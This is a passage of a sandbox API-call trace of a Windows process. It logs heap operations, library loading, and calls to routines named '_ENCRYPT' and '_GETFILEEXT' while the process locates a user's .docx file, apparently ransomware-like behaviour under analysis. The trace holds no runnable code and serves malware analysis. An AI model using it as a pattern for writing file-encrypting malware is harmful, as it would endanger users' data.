cbMultiByte=72, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0171.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=72, lpWideCharStr=0x8ee038, cchWideChar=72 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx") returned 72 [0171.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0171.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0171.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0171.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.730] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0171.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0171.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.732] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0171.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0171.732] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0171.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.734] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.735] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0171.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd468, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0171.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.735] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0171.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0171.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0171.736] CloseHandle (hObject=0x138) returned 1 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.736] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.737] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0171.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0171.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0171.737] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0171.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0171.738] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0171.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0171.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.738] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0171.738] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0171.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.738] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bbbac0, ftCreationTime.dwHighDateTime=0x1d5e544, ftLastAccessTime.dwLowDateTime=0xb4ebf4e0, ftLastAccessTime.dwHighDateTime=0x1d5debf, ftLastWriteTime.dwLowDateTime=0xb4ebf4e0, ftLastWriteTime.dwHighDateTime=0x1d5debf, nFileSizeHigh=0x0, 